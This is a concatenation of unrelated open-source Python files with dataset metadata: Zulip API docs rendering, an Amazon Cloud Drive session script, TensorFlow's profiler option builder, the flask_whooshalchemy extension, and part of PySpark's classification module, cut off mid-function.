add_api_uri_context(context, request)
raw_calls = open('templates/zerver/api_content.json', 'r').read()
calls = ujson.loads(raw_calls)
langs = set()
for call in calls:
call["endpoint"] = "%s/v1/%s" % (context["external_api_uri_subdomain"],
call["endpoint"])
call["example_request"]["curl"] = call["example_request"]["curl"].replace("https://api.zulip.com",
context["external_api_uri_subdomain"])
response = call['example_response']
if '\n' not in response:
# For 1-line responses, pretty-print them
extended_response = response.replace(", ", ",\n ")
else:
extended_response = response
call['rendered_response'] = bugdown.convert("~~~ .py\n" + extended_response + "\n~~~\n", bugdown.DEFAULT_BUGDOWN_KEY)
for example_type in ('request', 'response'):
for lang in call.get('example_' + example_type, []):
langs.add(lang)
return render_to_response(
'zerver/api_endpoints.html', {
'content': calls,
'langs': langs,
},
request=request)
| apache-2.0 | 1,749,742,848,947,373,600 | 39.135338 | 125 | 0.611652 | false |
dppereyra/pyamazonclouddrive | bin/acdsession.py | 10 | 3367 | #!/usr/bin/env python
#
# Copyright (c) 2011 anatanokeitai.com(sakurai_youhei)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os, sys, getpass
from optparse import OptionParser
try:
import pyacd
except ImportError:
pyacd_lib_dir=os.path.dirname(__file__)+os.sep+".."
if os.path.exists(pyacd_lib_dir) and os.path.isdir(pyacd_lib_dir):
sys.path.insert(0, pyacd_lib_dir)
import pyacd
parser=OptionParser(
epilog="This command updates/creates your session of Amazon Cloud Drive.",
usage="%prog -e youremail -p yourpassword -s path/to/sessionfile",
version=pyacd.__version__
)
parser.add_option(
"--domain",dest="domain",action="store",default="www.amazon.com",
help="domain of Amazon [default: %default]"
)
parser.add_option(
"-e",dest="email",action="store",default=None,
help="email address for Amazon"
)
parser.add_option(
"-p",dest="password",action="store",default=None,
help="password for Amazon"
)
parser.add_option(
"-s",dest="session",action="store",default=None,metavar="FILE",
help="save/load login session to/from FILE"
)
parser.add_option(
"-v",dest="verbose",action="store_true",default=False,
help="show verbose message"
)
def main():
opts,args=parser.parse_args(sys.argv[1:])
pyacd.set_amazon_domain(opts.domain)
for m in ["email","session"]:
if not opts.__dict__[m]:
print >>sys.stderr, "mandatory option is missing (%s)\n"%m
parser.print_help()
exit(2)
if not opts.password:
opts.password = getpass.getpass()
if os.path.isdir(opts.session):
print >>sys.stderr, "%s should not be directory."%s
exit(2)
if opts.verbose:
print >>sys.stderr, "Loading previous session...",
try:
s=pyacd.Session.load_from_file(opts.session)
if opts.verbose:
print >>sys.stderr, "Done."
except:
s=pyacd.Session()
if opts.verbose:
print >>sys.stderr, "Failed."
if opts.verbose:
print >>sys.stderr, "Logging into %s..."%opts.domain,
try:
session=pyacd.login(opts.email,opts.password,session=s)
if opts.verbose:
print >>sys.stderr, "Done."
if opts.verbose:
print >>sys.stderr, "Updating current session...",
session.save_to_file(opts.session)
if opts.verbose:
print >>sys.stderr, "Done."
except:
if opts.verbose:
print >>sys.stderr, "Failed."
if __name__=="__main__":
main()
| mit | 9,216,724,403,935,162,000 | 29.889908 | 76 | 0.696763 | false |
gautam1858/tensorflow | tensorflow/python/profiler/option_builder.py | 13 | 16616 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for building profiler options."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=['profiler.ProfileOptionBuilder'])
class ProfileOptionBuilder(object):
# pylint: disable=line-too-long
"""Option Builder for Profiling API.
For tutorial on the options, see
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
```python
# Users can use pre-built options:
opts = (
tf.profiler.ProfileOptionBuilder.trainable_variables_parameter())
# Or, build your own options:
opts = (tf.profiler.ProfileOptionBuilder()
.with_max_depth(10)
.with_min_micros(1000)
.select(['accelerator_micros'])
.with_stdout_output()
.build()
# Or customize the pre-built options:
opts = (tf.profiler.ProfileOptionBuilder(
tf.profiler.ProfileOptionBuilder.time_and_memory())
.with_displaying_options(show_name_regexes=['.*rnn.*'])
.build())
# Finally, profiling with the options:
_ = tf.profiler.profile(tf.get_default_graph(),
run_meta=run_meta,
cmd='scope',
options=opts)
```
"""
# pylint: enable=line-too-long
def __init__(self, options=None):
"""Constructor.
Args:
options: Optional initial option dict to start with.
"""
if options is not None:
self._options = copy.deepcopy(options)
else:
self._options = {'max_depth': 100,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'name',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': False,
'select': ['micros'],
'step': -1,
'output': 'stdout'}
@staticmethod
def trainable_variables_parameter():
"""Options used to profile trainable variable parameters.
Normally used together with 'scope' view.
Returns:
A dict of profiling options.
"""
return {'max_depth': 10000,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'name',
'account_type_regexes': [tfprof_logger.TRAINABLE_VARIABLES],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['params'],
'step': -1,
'output': 'stdout'}
@staticmethod
def float_operation():
# pylint: disable=line-too-long
"""Options used to profile float operations.
Please see https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/profile_model_architecture.md
on the caveats of calculating float operations.
Returns:
A dict of profiling options.
"""
# pylint: enable=line-too-long
return {'max_depth': 10000,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 1,
'min_occurrence': 0,
'order_by': 'float_ops',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['float_ops'],
'step': -1,
'output': 'stdout'}
@staticmethod
def time_and_memory(min_micros=1, min_bytes=1, min_accelerator_micros=0,
min_cpu_micros=0, min_peak_bytes=0, min_residual_bytes=0,
min_output_bytes=0):
"""Show operation time and memory consumptions.
Args:
min_micros: Only show profiler nodes with execution time
no less than this. It sums accelerator and cpu times.
min_bytes: Only show profiler nodes requested to allocate no less bytes
than this.
min_accelerator_micros: Only show profiler nodes spend no less than
this time on accelerator (e.g. GPU).
min_cpu_micros: Only show profiler nodes spend no less than
this time on cpu.
min_peak_bytes: Only show profiler nodes using no less than this bytes
at peak (high watermark). For profiler nodes consist of multiple
graph nodes, it sums the graph nodes' peak_bytes.
min_residual_bytes: Only show profiler nodes have no less than
this bytes not being de-allocated after Compute() ends. For
profiler nodes consist of multiple graph nodes, it sums the
graph nodes' residual_bytes.
min_output_bytes: Only show profiler nodes have no less than this bytes
output. The output are not necessarily allocated by this profiler
nodes.
Returns:
A dict of profiling options.
"""
return {'max_depth': 10000,
'min_bytes': min_bytes,
'min_peak_bytes': min_peak_bytes,
'min_residual_bytes': min_residual_bytes,
'min_output_bytes': min_output_bytes,
'min_micros': min_micros,
'min_accelerator_micros': min_accelerator_micros,
'min_cpu_micros': min_cpu_micros,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'micros',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['micros', 'bytes'],
'step': -1,
'output': 'stdout'}
def build(self):
"""Build a profiling option.
Returns:
A dict of profiling options.
"""
return copy.deepcopy(self._options)
def with_max_depth(self, max_depth):
"""Set the maximum depth of display.
The depth depends on profiling view. For 'scope' view, it's the
depth of name scope hierarchy (tree), for 'op' view, it's the number
of operation types (list), etc.
Args:
max_depth: Maximum depth of the data structure to display.
Returns:
self
"""
self._options['max_depth'] = max_depth
return self
def with_min_memory(self,
min_bytes=0,
min_peak_bytes=0,
min_residual_bytes=0,
min_output_bytes=0):
"""Only show profiler nodes consuming no less than 'min_bytes'.
Args:
min_bytes: Only show profiler nodes requested to allocate no less bytes
than this.
min_peak_bytes: Only show profiler nodes using no less than this bytes
at peak (high watermark). For profiler nodes consist of multiple
graph nodes, it sums the graph nodes' peak_bytes.
min_residual_bytes: Only show profiler nodes have no less than
this bytes not being de-allocated after Compute() ends. For
profiler nodes consist of multiple graph nodes, it sums the
graph nodes' residual_bytes.
min_output_bytes: Only show profiler nodes have no less than this bytes
output. The output are not necessarily allocated by this profiler
nodes.
Returns:
self
"""
self._options['min_bytes'] = min_bytes
self._options['min_peak_bytes'] = min_peak_bytes
self._options['min_residual_bytes'] = min_residual_bytes
self._options['min_output_bytes'] = min_output_bytes
return self
def with_min_execution_time(self,
min_micros=0,
min_accelerator_micros=0,
min_cpu_micros=0):
"""Only show profiler nodes consuming no less than 'min_micros'.
Args:
min_micros: Only show profiler nodes with execution time
no less than this. It sums accelerator and cpu times.
min_accelerator_micros: Only show profiler nodes spend no less than
this time on accelerator (e.g. GPU).
min_cpu_micros: Only show profiler nodes spend no less than
this time on cpu.
Returns:
self
"""
self._options['min_micros'] = min_micros
self._options['min_accelerator_micros'] = min_accelerator_micros
self._options['min_cpu_micros'] = min_cpu_micros
return self
def with_min_parameters(self, min_params):
"""Only show profiler nodes holding no less than 'min_params' parameters.
'Parameters' normally refers the weights of in TensorFlow variables.
It reflects the 'capacity' of models.
Args:
min_params: Only show profiler nodes holding number parameters
no less than this.
Returns:
self
"""
self._options['min_params'] = min_params
return self
def with_min_occurrence(self, min_occurrence):
# pylint: disable=line-too-long
"""Only show profiler nodes including no less than 'min_occurrence' graph nodes.
A "node" means a profiler output node, which can be a python line
(code view), an operation type (op view), or a graph node
(graph/scope view). A python line includes all graph nodes created by that
line, while an operation type includes all graph nodes of that type.
Args:
min_occurrence: Only show nodes including no less than this.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['min_occurrence'] = min_occurrence
return self
def with_min_float_operations(self, min_float_ops):
# pylint: disable=line-too-long
"""Only show profiler nodes consuming no less than 'min_float_ops'.
Please see https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/profile_model_architecture.md
on the caveats of calculating float operations.
Args:
min_float_ops: Only show profiler nodes with float operations
no less than this.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['min_float_ops'] = min_float_ops
return self
def with_accounted_types(self, account_type_regexes):
"""Selectively counting statistics based on node types.
Here, 'types' means the profiler nodes' properties. Profiler by default
consider device name (e.g. /job:xx/.../device:GPU:0) and operation type
(e.g. MatMul) as profiler nodes' properties. User can also associate
customized 'types' to profiler nodes through OpLogProto proto.
For example, user can select profiler nodes placed on gpu:0 with:
`account_type_regexes=['.*gpu:0.*']`
If none of a node's properties match the specified regexes, the node is
not displayed nor accounted.
Args:
account_type_regexes: A list of regexes specifying the types.
Returns:
self.
"""
self._options['account_type_regexes'] = copy.copy(account_type_regexes)
return self
def with_node_names(self,
start_name_regexes=None,
show_name_regexes=None,
hide_name_regexes=None,
trim_name_regexes=None):
"""Regular expressions used to select profiler nodes to display.
After 'with_accounted_types' is evaluated, 'with_node_names' are
evaluated as follows:
For a profile data structure, profiler first finds the profiler
nodes matching 'start_name_regexes', and starts displaying profiler
nodes from there. Then, if a node matches 'show_name_regexes' and
doesn't match 'hide_name_regexes', it's displayed. If a node matches
'trim_name_regexes', profiler stops further searching that branch.
Args:
start_name_regexes: list of node name regexes to start displaying.
show_name_regexes: list of node names regexes to display.
hide_name_regexes: list of node_names regexes that should be hidden.
trim_name_regexes: list of node name regexes from where to stop.
Returns:
self
"""
if start_name_regexes is not None:
self._options['start_name_regexes'] = copy.copy(start_name_regexes)
if show_name_regexes is not None:
self._options['show_name_regexes'] = copy.copy(show_name_regexes)
if hide_name_regexes is not None:
self._options['hide_name_regexes'] = copy.copy(hide_name_regexes)
if trim_name_regexes is not None:
self._options['trim_name_regexes'] = copy.copy(trim_name_regexes)
return self
def account_displayed_op_only(self, is_true):
"""Whether only account the statistics of displayed profiler nodes.
Args:
is_true: If true, only account statistics of nodes eventually
displayed by the outputs.
Otherwise, a node's statistics are accounted by its parents
as long as it's types match 'account_type_regexes', even if
it is hidden from the output, say, by hide_name_regexes.
Returns:
self
"""
self._options['account_displayed_op_only'] = is_true
return self
def with_empty_output(self):
"""Do not generate side-effect outputs."""
self._options['output'] = 'none'
return self
def with_stdout_output(self):
"""Print the result to stdout."""
self._options['output'] = 'stdout'
return self
def with_file_output(self, outfile):
"""Print the result to a file."""
self._options['output'] = 'file:outfile=%s' % outfile
return self
def with_timeline_output(self, timeline_file):
"""Generate a timeline json file."""
self._options['output'] = 'timeline:outfile=%s' % timeline_file
return self
def with_pprof_output(self, pprof_file):
"""Generate a pprof profile gzip file.
To use the pprof file:
pprof -png --nodecount=100 --sample_index=1 <pprof_file>
Args:
pprof_file: filename for output, usually suffixed with .pb.gz.
Returns:
self.
"""
self._options['output'] = 'pprof:outfile=%s' % pprof_file
return self
def order_by(self, attribute):
# pylint: disable=line-too-long
"""Order the displayed profiler nodes based on a attribute.
Supported attribute includes micros, bytes, occurrence, params, etc.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
Args:
attribute: An attribute the profiler node has.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['order_by'] = attribute
return self
def select(self, attributes):
# pylint: disable=line-too-long
"""Select the attributes to display.
See https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
for supported attributes.
Args:
attributes: A list of attribute the profiler node has.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['select'] = copy.copy(attributes)
return self
def with_step(self, step):
"""Which profile step to use for profiling.
The 'step' here refers to the step defined by `Profiler.add_step()` API.
Args:
step: When multiple steps of profiles are available, select which step's
profile to use. If -1, use average of all available steps.
Returns:
self
"""
self._options['step'] = step
return self
| apache-2.0 | -4,446,657,029,276,592,600 | 34.733333 | 128 | 0.618861 | false |
xkcd1253/Mimi | flask/lib/python2.7/site-packages/flask_whooshalchemy.py | 5 | 9043 | '''
whooshalchemy flask extension
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds whoosh indexing capabilities to SQLAlchemy models for Flask
applications.
:copyright: (c) 2012 by Karl Gyllstrom
:license: BSD (see LICENSE.txt)
'''
from __future__ import with_statement
from __future__ import absolute_import
from flask.ext.sqlalchemy import models_committed
import sqlalchemy
from whoosh.qparser import OrGroup
from whoosh.qparser import AndGroup
from whoosh.qparser import MultifieldParser
from whoosh.analysis import StemmingAnalyzer
import whoosh.index
from whoosh.fields import Schema
#from whoosh.fields import ID, TEXT, KEYWORD, STORED
import heapq
import os
__searchable__ = '__searchable__'
DEFAULT_WHOOSH_INDEX_NAME = 'whoosh_index'
class _QueryProxy(sqlalchemy.orm.Query):
# We're replacing the model's ``query`` field with this proxy. The main
# thing this proxy does is override the __iter__ method so that results are
# returned in the order of the whoosh score to reflect text-based ranking.
def __init__(self, query_obj, primary_key_name, whoosh_searcher, model):
# Make this a pure copy of the original Query object.
self.__dict__ = query_obj.__dict__.copy()
self._primary_key_name = primary_key_name
self._whoosh_searcher = whoosh_searcher
self._modelclass = model
# Stores whoosh results from query. If ``None``, indicates that no
# whoosh query was performed.
self._whoosh_rank = None
def __iter__(self):
''' Reorder ORM-db results according to Whoosh relevance score. '''
super_iter = super(_QueryProxy, self).__iter__()
if self._whoosh_rank is None:
# Whoosh search hasn't been run so behave as normal.
return super_iter
# Iterate through the values and re-order by whoosh relevance.
ordered_by_whoosh_rank = []
for row in super_iter:
# Push items onto heap, where sort value is the rank provided by
# Whoosh
heapq.heappush(ordered_by_whoosh_rank,
(self._whoosh_rank[unicode(getattr(row,
self._primary_key_name))], row))
def _inner():
while ordered_by_whoosh_rank:
yield heapq.heappop(ordered_by_whoosh_rank)[1]
return _inner()
def whoosh_search(self, query, limit=None, fields=None, or_=False):
'''
Execute text query on database. Results have a text-based
match to the query, ranked by the scores from the underlying Whoosh
index.
By default, the search is executed on all of the indexed fields as an
OR conjunction. For example, if a model has 'title' and 'content'
indicated as ``__searchable__``, a query will be checked against both
fields, returning any instance whose title or content are a content
match for the query. To specify particular fields to be checked,
populate the ``fields`` parameter with the desired fields.
By default, results will only be returned if they contain all of the
query terms (AND). To switch to an OR grouping, set the ``or_``
parameter to ``True``.
'''
if not isinstance(query, unicode):
query = unicode(query)
results = self._whoosh_searcher(query, limit, fields, or_)
if not results:
# We don't want to proceed with empty results because we get a
# stderr warning from sqlalchemy when executing 'in_' on empty set.
# However we cannot just return an empty list because it will not
# be a query.
# XXX is this efficient?
return self.filter('null')
result_set = set()
result_ranks = {}
for rank, result in enumerate(results):
pk = result[self._primary_key_name]
result_set.add(pk)
result_ranks[pk] = rank
f = self.filter(getattr(self._modelclass,
self._primary_key_name).in_(result_set))
f._whoosh_rank = result_ranks
return f
class _Searcher(object):
''' Assigned to a Model class as ``pure_search``, which enables
text-querying to whoosh hit list. Also used by ``query.whoosh_search``'''
def __init__(self, primary, indx):
self.primary_key_name = primary
self._index = indx
self.searcher = indx.searcher()
self._all_fields = list(set(indx.schema._fields.keys()) -
set([self.primary_key_name]))
def __call__(self, query, limit=None, fields=None, or_=False):
if fields is None:
fields = self._all_fields
group = OrGroup if or_ else AndGroup
parser = MultifieldParser(fields, self._index.schema, group=group)
return self._index.searcher().search(parser.parse(query),
limit=limit)
def whoosh_index(app, model):
''' Create whoosh index for ``model``, if one does not exist. If
the index exists it is opened and cached. '''
# gets the whoosh index for this model, creating one if it does not exist.
# A dict of model -> whoosh index is added to the ``app`` variable.
if not hasattr(app, 'whoosh_indexes'):
app.whoosh_indexes = {}
return app.whoosh_indexes.get(model.__name__,
_create_index(app, model))
def _create_index(app, model):
# a schema is created based on the fields of the model. Currently we only
# support primary key -> whoosh.ID, and sqlalchemy.(String, Unicode, Text)
# -> whoosh.TEXT.
if not app.config.get('WHOOSH_BASE'):
# XXX todo: is there a better approach to handle the absenSe of a
# config value for whoosh base? Should we throw an exception? If
# so, this exception will be thrown in the after_commit function,
# which is probably not ideal.
app.config['WHOOSH_BASE'] = DEFAULT_WHOOSH_INDEX_NAME
# we index per model.
wi = os.path.join(app.config.get('WHOOSH_BASE'),
model.__name__)
schema, primary_key = _get_whoosh_schema_and_primary_key(model)
if whoosh.index.exists_in(wi):
indx = whoosh.index.open_dir(wi)
else:
if not os.path.exists(wi):
os.makedirs(wi)
indx = whoosh.index.create_in(wi, schema)
app.whoosh_indexes[model.__name__] = indx
searcher = _Searcher(primary_key, indx)
model.query = _QueryProxy(model.query, primary_key,
searcher, model)
model.pure_whoosh = searcher
return indx
def _get_whoosh_schema_and_primary_key(model):
schema = {}
primary = None
searchable = set(model.__searchable__)
for field in model.__table__.columns:
if field.primary_key:
schema[field.name] = whoosh.fields.ID(stored=True, unique=True)
primary = field.name
if field.name in searchable and isinstance(field.type,
(sqlalchemy.types.Text, sqlalchemy.types.String,
sqlalchemy.types.Unicode)):
schema[field.name] = whoosh.fields.TEXT(
analyzer=StemmingAnalyzer())
return Schema(**schema), primary
def _after_flush(app, changes):
# Any db updates go through here. We check if any of these models have
# ``__searchable__`` fields, indicating they need to be indexed. With these
# we update the whoosh index for the model. If no index exists, it will be
# created here; this could impose a penalty on the initial commit of a
# model.
bytype = {} # sort changes by type so we can use per-model writer
for change in changes:
update = change[1] in ('update', 'insert')
if hasattr(change[0].__class__, __searchable__):
bytype.setdefault(change[0].__class__.__name__, []).append((update,
change[0]))
for model, values in bytype.iteritems():
index = whoosh_index(app, values[0][1].__class__)
with index.writer() as writer:
primary_field = values[0][1].pure_whoosh.primary_key_name
searchable = values[0][1].__searchable__
for update, v in values:
if update:
attrs = {}
for key in searchable:
try:
attrs[key] = unicode(getattr(v, key))
except AttributeError:
raise AttributeError('{0} does not have {1} field {2}'
.format(model, __searchable__, key))
attrs[primary_field] = unicode(getattr(v, primary_field))
writer.update_document(**attrs)
else:
writer.delete_by_term(primary_field, unicode(getattr(v,
primary_field)))
models_committed.connect(_after_flush)
# def init_app(db):
# app = db.get_app()
# # for table in db.get_tables_for_bind():
# for item in globals():
#
# #_create_index(app, table)
| gpl-2.0 | 4,833,850,226,278,433,000 | 32.246324 | 82 | 0.607652 | false |
ZxlAaron/mypros | python/pyspark/ml/classification.py | 10 | 64620 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import operator
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.param.shared import *
from pyspark.ml.regression import DecisionTreeModel, DecisionTreeRegressionModel, \
RandomForestParams, TreeEnsembleModel, TreeEnsembleParams
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaParams
from pyspark.ml.wrapper import JavaWrapper
from pyspark.ml.common import inherit_doc
from pyspark.sql import DataFrame
from pyspark.sql.functions import udf, when
from pyspark.sql.types import ArrayType, DoubleType
from pyspark.storagelevel import StorageLevel
__all__ = ['LogisticRegression', 'LogisticRegressionModel',
'LogisticRegressionSummary', 'LogisticRegressionTrainingSummary',
'BinaryLogisticRegressionSummary', 'BinaryLogisticRegressionTrainingSummary',
'DecisionTreeClassifier', 'DecisionTreeClassificationModel',
'GBTClassifier', 'GBTClassificationModel',
'RandomForestClassifier', 'RandomForestClassificationModel',
'NaiveBayes', 'NaiveBayesModel',
'MultilayerPerceptronClassifier', 'MultilayerPerceptronClassificationModel',
'OneVsRest', 'OneVsRestModel']
@inherit_doc
class JavaClassificationModel(JavaPredictionModel):
"""
(Private) Java Model produced by a ``Classifier``.
Classes are indexed {0, 1, ..., numClasses - 1}.
To be mixed in with class:`pyspark.ml.JavaModel`
"""
@property
@since("2.1.0")
def numClasses(self):
"""
Number of classes (values which the label can take).
"""
return self._call_java("numClasses")
@inherit_doc
class LogisticRegression(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasMaxIter,
HasRegParam, HasTol, HasProbabilityCol, HasRawPredictionCol,
HasElasticNetParam, HasFitIntercept, HasStandardization, HasThresholds,
HasWeightCol, HasAggregationDepth, JavaMLWritable, JavaMLReadable):
"""
Logistic regression.
This class supports multinomial logistic (softmax) and binomial logistic regression.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> bdf = sc.parallelize([
... Row(label=1.0, weight=2.0, features=Vectors.dense(1.0)),
... Row(label=0.0, weight=2.0, features=Vectors.sparse(1, [], []))]).toDF()
>>> blor = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight")
>>> blorModel = blor.fit(bdf)
>>> blorModel.coefficients
DenseVector([5.5...])
>>> blorModel.intercept
-2.68...
>>> mdf = sc.parallelize([
... Row(label=1.0, weight=2.0, features=Vectors.dense(1.0)),
... Row(label=0.0, weight=2.0, features=Vectors.sparse(1, [], [])),
... Row(label=2.0, weight=2.0, features=Vectors.dense(3.0))]).toDF()
>>> mlor = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight",
... family="multinomial")
>>> mlorModel = mlor.fit(mdf)
>>> print(mlorModel.coefficientMatrix)
DenseMatrix([[-2.3...],
[ 0.2...],
[ 2.1... ]])
>>> mlorModel.interceptVector
DenseVector([2.0..., 0.8..., -2.8...])
>>> test0 = sc.parallelize([Row(features=Vectors.dense(-1.0))]).toDF()
>>> result = blorModel.transform(test0).head()
>>> result.prediction
0.0
>>> result.probability
DenseVector([0.99..., 0.00...])
>>> result.rawPrediction
DenseVector([8.22..., -8.22...])
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(1, [0], [1.0]))]).toDF()
>>> blorModel.transform(test1).head().prediction
1.0
>>> blor.setParams("vector")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
>>> lr_path = temp_path + "/lr"
>>> blor.save(lr_path)
>>> lr2 = LogisticRegression.load(lr_path)
>>> lr2.getMaxIter()
5
>>> model_path = temp_path + "/lr_model"
>>> blorModel.save(model_path)
>>> model2 = LogisticRegressionModel.load(model_path)
>>> blorModel.coefficients[0] == model2.coefficients[0]
True
>>> blorModel.intercept == model2.intercept
True
.. versionadded:: 1.3.0
"""
threshold = Param(Params._dummy(), "threshold",
"Threshold in binary classification prediction, in range [0, 1]." +
" If threshold and thresholds are both set, they must match." +
"e.g. if threshold is p, then thresholds must be equal to [1-p, p].",
typeConverter=TypeConverters.toFloat)
family = Param(Params._dummy(), "family",
"The name of family which is a description of the label distribution to " +
"be used in the model. Supported options: auto, binomial, multinomial",
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True,
threshold=0.5, thresholds=None, probabilityCol="probability",
rawPredictionCol="rawPrediction", standardization=True, weightCol=None,
aggregationDepth=2, family="auto"):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True, \
threshold=0.5, thresholds=None, probabilityCol="probability", \
rawPredictionCol="rawPrediction", standardization=True, weightCol=None, \
aggregationDepth=2, family="auto")
If the threshold and thresholds Params are both set, they must be equivalent.
"""
super(LogisticRegression, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.LogisticRegression", self.uid)
self._setDefault(maxIter=100, regParam=0.0, tol=1E-6, threshold=0.5, family="auto")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
self._checkThresholdConsistency()
@keyword_only
@since("1.3.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True,
threshold=0.5, thresholds=None, probabilityCol="probability",
rawPredictionCol="rawPrediction", standardization=True, weightCol=None,
aggregationDepth=2, family="auto"):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True, \
threshold=0.5, thresholds=None, probabilityCol="probability", \
rawPredictionCol="rawPrediction", standardization=True, weightCol=None, \
aggregationDepth=2, family="auto")
Sets params for logistic regression.
If the threshold and thresholds Params are both set, they must be equivalent.
"""
kwargs = self.setParams._input_kwargs
self._set(**kwargs)
self._checkThresholdConsistency()
return self
def _create_model(self, java_model):
return LogisticRegressionModel(java_model)
@since("1.4.0")
def setThreshold(self, value):
"""
Sets the value of :py:attr:`threshold`.
Clears value of :py:attr:`thresholds` if it has been set.
"""
self._set(threshold=value)
self._clear(self.thresholds)
return self
@since("1.4.0")
def getThreshold(self):
"""
Get threshold for binary classification.
If :py:attr:`thresholds` is set with length 2 (i.e., binary classification),
this returns the equivalent threshold:
:math:`\\frac{1}{1 + \\frac{thresholds(0)}{thresholds(1)}}`.
Otherwise, returns :py:attr:`threshold` if set or its default value if unset.
"""
self._checkThresholdConsistency()
if self.isSet(self.thresholds):
ts = self.getOrDefault(self.thresholds)
if len(ts) != 2:
raise ValueError("Logistic Regression getThreshold only applies to" +
" binary classification, but thresholds has length != 2." +
" thresholds: " + ",".join(ts))
return 1.0/(1.0 + ts[0]/ts[1])
else:
return self.getOrDefault(self.threshold)
@since("1.5.0")
def setThresholds(self, value):
"""
Sets the value of :py:attr:`thresholds`.
Clears value of :py:attr:`threshold` if it has been set.
"""
self._set(thresholds=value)
self._clear(self.threshold)
return self
@since("1.5.0")
def getThresholds(self):
"""
If :py:attr:`thresholds` is set, return its value.
Otherwise, if :py:attr:`threshold` is set, return the equivalent thresholds for binary
classification: (1-threshold, threshold).
If neither are set, throw an error.
"""
self._checkThresholdConsistency()
if not self.isSet(self.thresholds) and self.isSet(self.threshold):
t = self.getOrDefault(self.threshold)
return [1.0-t, t]
else:
return self.getOrDefault(self.thresholds)
def _checkThresholdConsistency(self):
if self.isSet(self.threshold) and self.isSet(self.thresholds):
ts = self.getParam(self.thresholds)
if len(ts) != 2:
